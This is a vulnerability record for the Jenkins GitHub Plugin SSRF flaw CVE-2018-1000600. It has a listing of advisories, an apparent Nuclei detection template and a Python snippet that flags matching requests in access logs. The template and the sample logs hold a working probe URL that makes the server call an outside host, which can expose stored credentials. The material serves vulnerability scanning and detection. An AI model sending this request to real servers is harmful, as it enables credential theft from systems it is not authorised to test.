| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2018-1000600 | 21 Sep 2021 06:42 | – | circl |
| CloudBees Jenkins GitHub Plugin Information Disclosure Vulnerability (CNVD-2018-12811) | 9 Jul 2018 00:00 | – | cnvd |
| CVE-2018-1000600 | 26 Jun 2018 17:00 | – | cve |
| CVE-2018-1000600 | 26 Jun 2018 17:00 | – | cvelist |
| CSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials | 13 May 2022 01:48 | – | github |
| CVE-2018-1000600 | 26 Jun 2018 17:29 | – | nvd |
| GHSA-6CVM-V6QJ-HJQ9 CSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials | 13 May 2022 01:48 | – | osv |
| Design/Logic Flaw | 26 Jun 2018 17:29 | – | prion |
| CVE-2018-1000600 | 28 Jun 2018 09:49 | – | redhatcve |
| CSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials | 25 Jun 2018 00:00 | – | jenkins |
id: CVE-2018-1000600

info:
  name: Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery
  author: geeknik
  severity: high
  description: |
    Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further attacks on the network.
  remediation: |
    Upgrade Jenkins GitHub Plugin to version 1.29.2 or later to mitigate the vulnerability.
  reference:
    - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915
    - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
    - https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000600
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2018-1000600
    cwe-id: CWE-200
    epss-score: 0.90894
    epss-percentile: 0.99794
    cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:*
  metadata:
    max-request: 1
    vendor: jenkins
    product: github
    framework: jenkins
  tags: cve,cve2018,jenkins,ssrf,oast,github,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP interaction
        words:
          - "http"
# digest: 4b0a00483046022100bdbb777a60848b570a84e143f80273262d3c612dd3ad6200a56061d816b0382f022100a87de8985a2ea00bb8560ecf7c6f0f7f92e05119cbc9380fa5877e14e11b36f1:922c64590222798bb761d5b6d8e72950
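As an added example that is not part of this template or of Jenkins, the following Python snippet shows how a defender can spot the same request shape in web-server access logs: it picks out requests to the createTokenByPassword endpoint named in the template path and flags those whose apiUrl parameter points at a host other than the expected GitHub API. The log-line format, the allowed-host list and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint the template's probe requests (taken from the template path above).
ENDPOINT_RE = re.compile(
    r"descriptorByName/org\.jenkinsci\.plugins\.github\.config\."
    r"GitHubTokenCredentialsCreator/createTokenByPassword"
)
# Assumed access-log shape: <ip> - <user> [<ts>] "<method> <path> <proto>" <status>
LINE_RE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
ALLOWED_API_HOSTS = frozenset({"api.github.com"})  # assumption; add your GHE host

def analyse_line(line, allowed_hosts=ALLOWED_API_HOSTS):
    """Return a finding for a createTokenByPassword request, or None otherwise."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, user, ts, method, path, status = m.groups()
    if not ENDPOINT_RE.search(path):
        return None
    # parse_qs percent-decodes, so an encoded apiUrl value is handled too.
    api_url = parse_qs(urlsplit(path).query).get("apiUrl", [""])[0]
    host = (urlsplit(api_url).hostname or "").lower()
    return {
        "ip": ip, "user": user, "time": ts, "method": method,
        "status": int(status), "api_url": api_url,
        # An apiUrl naming a foreign host is the SSRF signal: the plugin would
        # send the selected Jenkins credentials to that host.
        "off_host": bool(host) and host not in allowed_hosts,
    }

def find_suspicious(lines):
    """Findings whose apiUrl points outside the allowed GitHub API hosts."""
    return [f for f in map(analyse_line, lines) if f and f["off_host"]]

# Constructed sample log: an out-of-band probe, a legitimate call, an unrelated hit.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Jun/2018:10:01:02 +0000] "GET /securityRealm/user/admin/'
    'descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/'
    'createTokenByPassword?apiUrl=http://example.oast.invalid HTTP/1.1" 200',
    '10.0.0.8 - alice [25/Jun/2018:10:02:00 +0000] "POST /descriptorByName/'
    'org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/'
    'createTokenByPassword?apiUrl=https://api.github.com HTTP/1.1" 200',
    '10.0.0.9 - bob [25/Jun/2018:10:03:00 +0000] "GET /job/build/1/console HTTP/1.1" 200',
]

if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} user={f['user']} apiUrl={f['api_url']}")
```

Any hit on this endpoint from an instance still running plugin 1.29.1 or earlier is worth a look; the off-host filter only separates probes from legitimate configuration traffic.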